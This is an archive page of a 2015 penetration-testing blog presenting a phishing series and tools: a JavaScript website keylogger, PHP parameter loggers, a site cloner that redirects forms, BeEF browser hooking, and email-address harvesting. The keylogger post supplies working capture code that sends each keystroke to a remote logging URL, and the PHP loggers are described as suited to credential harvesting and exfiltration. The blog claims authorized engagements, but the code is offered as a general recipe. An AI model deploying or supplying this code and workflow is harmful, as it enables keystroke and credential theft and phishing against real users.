Hillbilly StoryTime: 2015

Thursday, April 9, 2015

New Script/Tool: KeyLogging in JavaScript

So, you want to set up a keylogger within a website.  Ultimately, it is fairly simple.  There are two items you will need: first, a way to log the keystrokes, and second, a way to capture the keystrokes.

For logging the keystrokes, the simplest way is a small script similar to the following one.  This script accepts any GET or POST parameter and then logs it to the specified file.  Of course, this assumes that you have a place to host the script and that the script has the proper permissions to create and write to the log file.
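A minimal sketch of such a logging script, assuming PHP as the server-side language (the log filename is an illustrative assumption):

```php
<?php
// Minimal GET/POST parameter logger. The log filename is illustrative;
// make sure the web server can create and write to it.
$logfile = "keylog.txt";
$entry = date("c") . " " . $_SERVER['REMOTE_ADDR'];
foreach (array_merge($_GET, $_POST) as $key => $value) {
    $entry .= " " . $key . "=" . $value;
}
file_put_contents($logfile, $entry . "\n", FILE_APPEND | LOCK_EX);
?>
```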

It should be noted that I have used a version of that logging script in numerous situations, mostly for social engineering.  It works well for credential harvesting websites.  It is also useful as a simple data exfiltration script.

With that taken care of, we now need a way to capture the keystrokes.  One of the simplest approaches is demonstrated in the following code sample.  This code, when included within a webpage (with the proper surrounding "script" tags), will capture every key pressed (as long as it is a printable character) and then send it off to a secondary logging script.
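A minimal sketch of such a capture script (the logging URL is a placeholder assumption, not the original code):

```javascript
// Capture printable keystrokes and beacon them to a logging script.
// LOG_URL is a placeholder assumption; point it at your own logger.
var LOG_URL = "http://example.com/log.php";
var captured = "";

// Append one character to the local buffer of captured keys.
function recordKey(ch) {
  captured += ch;
  return captured;
}

function onKeyPress(e) {
  // "keypress" fires only for printable characters.
  var ch = String.fromCharCode(e.which || e.keyCode);
  recordKey(ch);
  // Exfiltrate the keystroke via a simple image request.
  new Image().src = LOG_URL + "?keys=" + encodeURIComponent(ch);
}

// Attach the handler only when running inside a browser.
if (typeof document !== "undefined") {
  document.onkeypress = onKeyPress;
}
```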

The previous simple key capture script has a few limitations.  The primary one is that it only captures printable characters.  Thus, key presses like [Backspace], [Tab], [Enter], and the arrow keys will not be captured.  To account for these missing keys, it is important to listen not only for "onkeypress" but also for "onkeydown".  The following code takes this into account to provide a much more complete key capturing script.
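A sketch of a more complete capturer along these lines (the logging URL and the mapping of special keys are illustrative assumptions):

```javascript
// Capture printable characters via onkeypress and special keys via
// onkeydown. LOG_URL is a placeholder assumption.
var LOG_URL = "http://example.com/log.php";
var captured = "";

// Illustrative mapping of non-printable keyCodes to readable labels.
var SPECIAL_KEYS = {
  8: "[Backspace]", 9: "[Tab]", 13: "[Enter]", 27: "[Esc]",
  37: "[Left]", 38: "[Up]", 39: "[Right]", 40: "[Down]", 46: "[Delete]"
};

// Turn a keyCode into the text to log. keypress events map straight
// to their character; keydown events map only the special keys, so
// ordinary letters are not logged twice.
function label(keyCode, printable) {
  if (printable) return String.fromCharCode(keyCode);
  return SPECIAL_KEYS[keyCode] || "";
}

function send(fragment) {
  captured += fragment;
  new Image().src = LOG_URL + "?keys=" + encodeURIComponent(fragment);
}

// Attach both handlers only when running inside a browser.
if (typeof document !== "undefined") {
  document.onkeypress = function (e) {
    send(label(e.which || e.keyCode, true));
  };
  document.onkeydown = function (e) {
    var text = label(e.which || e.keyCode, false);
    if (text) send(text);
  };
}
```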

Hopefully, you will find these scripts of use.  As always, if you have any questions/comments/criticisms, please feel free to let me know.

Monday, April 6, 2015

New Script/Tool: BeEF RESTful API in Python

The BeEF (Browser Exploitation Framework) Project is a penetration tool that is focused on attacking and exploiting web browsers.  You can find out more information about the BeEF project at their website as well as on their GitHub page.

How about a little more information on the tool? (not all inclusive, just some high points)
  • BeEF is written in Ruby.
  • It is bundled as part of the Kali Linux Penetration Testing Distro by default.
  • It has a large number of modules which can help in pulling information from, attacking, and exploiting a wide number of web browsers.
  • If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.
  • BeEF has a RESTful API.
  • In order to make use of BeEF, an attacker only needs to start up BeEF and add one simple line of HTML to the target website.

It is these last two items which make it of particular interest during a phishing exercise/engagement.  The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.
<script type=text/javascript src=></script>
Combine this with the ability to control, monitor, and pull data from BeEF using its RESTful API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.

Unfortunately, I could not find an implementation of the BeEF RESTful API for Python that I was happy with.  That is why I wrote my own BeEF RESTful API Python module.  It can be found on GitHub at  It does not incorporate all of the functions that the BeEF RESTful API allows for, but it does incorporate all of the ones I found useful.
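As an illustration of the kind of calls such a module wraps, here is a minimal sketch against BeEF's RESTful API using only the standard library.  The host, port, credentials, and endpoint paths reflect BeEF's documented defaults, but treat them as assumptions rather than a copy of my module:

```python
import json
import urllib.request

BEEF = "http://127.0.0.1:3000"  # assumption: BeEF's default host and port

def api_url(path, token=None):
    # BeEF's RESTful endpoints live under /api/ and take the
    # authentication token as a query-string parameter.
    url = "%s/api/%s" % (BEEF, path)
    if token is not None:
        url += "?token=%s" % token
    return url

def login(username, password):
    # POST credentials to /api/admin/login; the JSON response
    # carries the token used by every subsequent call.
    req = urllib.request.Request(
        api_url("admin/login"),
        data=json.dumps({"username": username, "password": password}).encode(),
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["token"]

def hooked_browsers(token):
    # List the browsers currently hooked into BeEF.
    with urllib.request.urlopen(api_url("hooks", token)) as resp:
        return json.load(resp)

# Example usage (requires a running BeEF instance):
#   token = login("beef", "beef")
#   print(hooked_browsers(token))
```

The commented example at the bottom requires a running BeEF instance; everything above it is plain URL and request construction.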

Please take a look and use it if you find it useful.  If you have comments/criticisms/etc with the code, please feel free to let me know.

Friday, April 3, 2015

New Script/Tool:

As mentioned in an earlier post, I decided to write my own site cloner tool for use in my phishing exercises/engagements.  I needed a tool that would completely (or as close as I could get) clone any given site and then update any forms to point to a data collection script that I specify.

The current version of the "Site Cloner" tool is hosted on GitHub at

In order to run the script, simply execute:
python <URL> <outdirectory> (optional <form action>)
      <URL> = the full URL of the page to be cloned
      <outdirectory> = where do you want the files to be saved to
      <form action> = the script to execute when someone submits a form
An example would be:
python "" "safelogin" log.php
This command line would execute "" on the URL "", save all files into the directory "./safelogin", and finally rewrite all forms to submit to a script called "log.php".  That script (log.php) will have to be created later and stored in the same directory.

When the script is run, you will see verbose output similar to the following:

In this output you can see each page, link, file, and form that the script identifies and what it does with it.  Some files (binary formats such as images) are simply downloaded, whereas HTML documents are processed for additional links and forms.  Any time a form is encountered, the "form tag" is rewritten.
FOUND A FORM                [<form class="form-horizontal" action="/create.php" method="GET">]
REWROTE FORM TO BE  [<form method="get" action="log.php" class="form-horizontal">]
As shown in the above example, the form action was changed from "/create.php" to "log.php".  Doing this automatically saves time and effort by not requiring the user to go back, find, and edit all of the forms themselves.
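The rewriting step can be sketched as a small regular-expression pass.  This is a simplified stand-in for what the site cloner does, not its actual code:

```python
import re

def rewrite_forms(html, new_action):
    # Rewrite the action attribute of every <form> tag so that all
    # submissions go to our data collection script instead.
    def fix(tag_match):
        tag = tag_match.group(0)
        if re.search(r'action\s*=\s*["\'][^"\']*["\']', tag, re.I):
            return re.sub(r'action\s*=\s*["\'][^"\']*["\']',
                          'action="%s"' % new_action, tag, flags=re.I)
        # No action attribute present: insert one before the closing '>'.
        return tag[:-1] + ' action="%s">' % new_action
    return re.sub(r'<form\b[^>]*>', fix, html, flags=re.I)

form = '<form class="form-horizontal" action="/create.php" method="GET">'
print(rewrite_forms(form, "log.php"))
# → <form class="form-horizontal" action="log.php" method="GET">
```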

Below is an example of what "log.php" could look like:
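A minimal sketch of what such a "log.php" could contain (the log filename is an illustrative assumption):

```php
<?php
// Record every field submitted to the cloned form, one line per request.
// "forms.txt" is an illustrative filename.
$line = date("c") . " " . $_SERVER['REMOTE_ADDR'];
foreach (array_merge($_GET, $_POST) as $field => $value) {
    $line .= " " . $field . "=" . $value;
}
file_put_contents("forms.txt", $line . "\n", FILE_APPEND | LOCK_EX);
?>
```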

I hope this script is of use to you.  As always, if you have any comments/criticisms,etc, please leave a comment below.

Thursday, April 2, 2015

Phishing 101: Cloning a Site

Many phishing exercises/engagements require both the sending of a malicious email as well as the presence of a malicious website/web server. This is definitely the case where the goal is to collect credentials or to exploit the user's web browser.

Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.

Browser Exploitation

First, you could create a dummy site that simply contains some malicious code; the site does not really need to display anything to the user.  This is common with browser attacks.  One example of this is when using the BeEF (Browser Exploitation Framework) project.

The BeEF Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their website as well as on their GitHub page.

If you take this approach, BeEF makes it very easy in that once you have BeEF running, you can create a web page that contains a line similar to:
<script type=text/javascript src=></script>
You would want to replace the "" with the IP of the Internet facing system that BeEF is running on.  Then send an email to the target instructing them to visit the website you inserted that line into; once the target visits the malicious website, you should have a successfully compromised web browser.

Information/Credential Harvesting

Now for the second type of malicious website.  This type is a website that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as a username, password, or RSA token.

To make such a site, you can:
  • use "wget" to clone an existing site, then edit it
  • make it entirely by hand
  • use a dedicated site-cloning tool and then edit the results

If you wish to use "wget" to clone a site, the following options will come in handy.
  • perform full clone:
    • wget -m -p -k <URL>
      • -m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.
      • -p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.
  • only clone X levels deep:
    • wget -r -l X -p -k <URL>
      • -r = Enable recursion
      • -l X = Limit recursion to X levels deep
      • -p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.

You may ask why you would not always just do a full clone.  Well, if you only want to capture the values entered into a particular form, you only need to clone that page and not the rest of the site.

Now that you have cloned the site (or as much of it as you need), you will need to edit the HTML and make any necessary changes to the forms in order to capture the credentials.  This is also the time to make any other edits you desire.  When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form.  The code sample below is a simple PHP script that will log all GET and POST parameters passed to it.
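A minimal sketch of such a parameter-logging script (the log filename is an illustrative assumption):

```php
<?php
// Append all GET/POST parameters from this request to a log file.
// The filename is illustrative.
$params = array_merge($_GET, $_POST);
file_put_contents("harvest.txt",
    date("c") . " " . json_encode($params) . "\n",
    FILE_APPEND | LOCK_EX);
?>
```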

When creating a website by hand, you can get a bit of a head start by opening the page you want to clone, selecting "view source", copying it all, and pasting it into a new HTML document.  Then, as before, you will need to make any necessary changes to the HTML.

There are a few tools available to help such as HTTrack. According to the website,
[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
Again, as before, you will need to make any necessary changes to the HTML.

Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms.  The script can be found at  I will be releasing a new blog post describing the details of this script in the next few days.

Wednesday, April 1, 2015

New Script/Tool: Email Address Finder

While performing various phishing exercises/engagements, I found myself having to identify lists of potential email addresses on a regular basis.  Tools like "theHarvester" make this task easier; however, theHarvester does not find only email addresses.  It also finds associated host names, and while it does search a large number of search engines, it did not search all of the ones I thought it should.

As a result, I ended up writing my own minimal script to search for email addresses across all of the search engines I could think of at the time.  The tool currently searches for email addresses across eight different search engine sources:

  • Google
  • Bing
  • Ask
  • Dogpile
  • Yandex
  • Baidu
  • Yahoo
  • DuckDuckGo
Simply run:
python <target domain>
and it will start querying each of the above listed search engines for records that match
@<target domain>
and then parse the resulting output for strings that match the email regex of
[a-zA-Z0-9\.\-_]+@[a-zA-Z0-9\.\-]* + <target domain>
Once the regex has been applied, all of the identified email addresses are added to a list and uniqued to produce the final list of identified potential email addresses.

I fully admit that this code is not new or unique, but I wrote it to suit my needs and if you find it useful as well, then please let me know.  If you have suggested improvements, find errors, etc, please let me know as well.

You can find this code located at:

Tuesday, March 31, 2015

Phishing 101: Target Identification / OSINT

When a new phishing exercise/engagement begins, one of the first items to collect is a list of target email addresses.  This is typically handled in one of two ways (or, in some cases, a combination of them).

  1. The customer provides a list of email addresses to be targeted.  All phishing emails MUST be sent to one of the email addresses in the list.
  2. The attacker (you) must do your own research to identify potential email targets.

As the first way (the customer provides the target list) is a bit boring to discuss here, we will focus on the second: finding your own targets.  This type of internet recon is typically referred to as OSINT (Open Source Intelligence).  As I covered a bit of OSINT in a previous post, I will review it here and add additional information as needed.

In your attempts to identify potential email targets for the phishing exercise/engagement, you will find that there are many resources (websites and tools) that can aid your research/intelligence gathering.  Some of the common resources I find useful for identifying email addresses are described below.

Google, Bing, and other search engines can be a great asset in identifying email addresses.  Simply by searching for "@<>" you should get a list of links, each containing an email address in the displayed description.  Then, by simply copy-and-pasting the email addresses into a targets file, you can start building your list.  Please note that tools like "theHarvester", mentioned later, can do this for you.

Social media sites are rife with useful information.  Most of them have a way to search for people who say they work for a particular company.  Thus, by searching for "employees of <target company>" you should be presented with a list of potential employees.  Unfortunately, most social media sites do not display email addresses.  However, they do usually display first and last names.  Now, if you have been able to identify a few (or at least one) valid email addresses, you should know the email address format.  Common email formats are (fn = first name, fi = first initial, ln = last name):

  • [fi][ln]
  • [fn].[ln]
  • [fn]_[ln]

By using this knowledge and the list of first and last names you collected, you should be able to convert them into likely email addresses.  Again, it should be noted that the tool Recon-ng has the ability to semi-automate this process of searching social media sites, identifying reported employees, and mangling their names into potential email addresses.

Additionally, some of the common tools I typically employ for OSINT are described below.

"whois" is a command line tool that allows you to look up information on a particular domain name.  Many times, this information will contain a few email addresses, names, and phone numbers, all of which can be useful during the phishing exercise/engagement.

As mentioned before, "theHarvester" is a command line Linux tool that can perform various searches against common search engines, to identify email addresses and host names associated with a target domain name.

Again, as mentioned earlier, "Recon-ng" is a command line Linux tool that can perform various searches using a multitude of online sources to identify potential employees of a company, identify potentially leaked passwords, generate potential target email address lists, and gather many other bits of useful information.

"Foca" is a windows binary that can search a given target website for any available documents (office docs, pdfs, etc) and then extracts the "metadata" from the documents to identify interesting information such as:

  • usernames
  • machine names
  • installed software
It should be noted that FOCA is a commercial product, but a limited/free version is available.

"Maltego" is sort of a "catch all" tool for OSINT.  Maltego can perform numerous "transforms" on entered and gathered data to identify associated data from numerous online sources.  For example, given a company name, it can identify potential email addresses.  From those email addresses, it can attempt to idenify the associate People (first name and last name) as well as any online accounts that have the associated email address.  And so on.  It should be noted that Maltego is a commercial product, but does have a limited/free version available.

By no means are the lists above all-inclusive.  These are just some of the tools I find myself using on a regular basis.  New tools are being developed all the time, as are improvements to the older ones.

In future blog posts, I may go into more detailed reviews of some of the mentioned tools, but for now, just know they exist; go download them and try them out.

As always, all comments/questions/criticisms are welcomed.

Friday, March 27, 2015

Phishing 101: An Intro

If you search on the internet or attend pretty much any security conference, you will find a plethora of information on what "phishing" is and how to perform it.  As such, this post (and the following ones in the series) will just cover the high points and provide useful references on where you can find more in-depth information.

At its core, phishing is the sending of an email to a target with the intent of having the target perform some action which will lead to the attacker gaining some new piece of information or access.

That statement is a bit vague, and it is meant to be.  That is because phishing can take many forms with many different desired outcomes.  The typical outcomes are:
  • harvesting credentials from a target, typically via a credential harvesting website
  • compromise of the target's web browser via a drive-by browser attack or a malicious Java payload
  • compromise of a target's system typically via a malicious attachment
For the purposes of this blog post and the following ones, we will be discussing phishing primarily from the perspective of a contractually/legally authorized phishing exercise/engagement.

For most phishing exercises/engagements, the following four steps will occur:
  1. Target identification via
    1. the customer providing the target list
    2. the attacker performing Open Source Intelligence Gathering (OSINT)
  2. One or more websites are designed and made active.
    1. Two possible site types are:
      1. credential harvesting
      2. browser exploit
  3. The attacker will craft and then send the phishing emails to the target email addresses.
    1. These emails could be nothing more than a simple template containing a url to one of the previously designed websites, or it could contain a malicious attachment.
  4. As the exercise/engagement progresses, the attacker will monitor the results and use them to ultimately create a report for the customer.
Each of these steps will be discussed in more detail in future blog posts.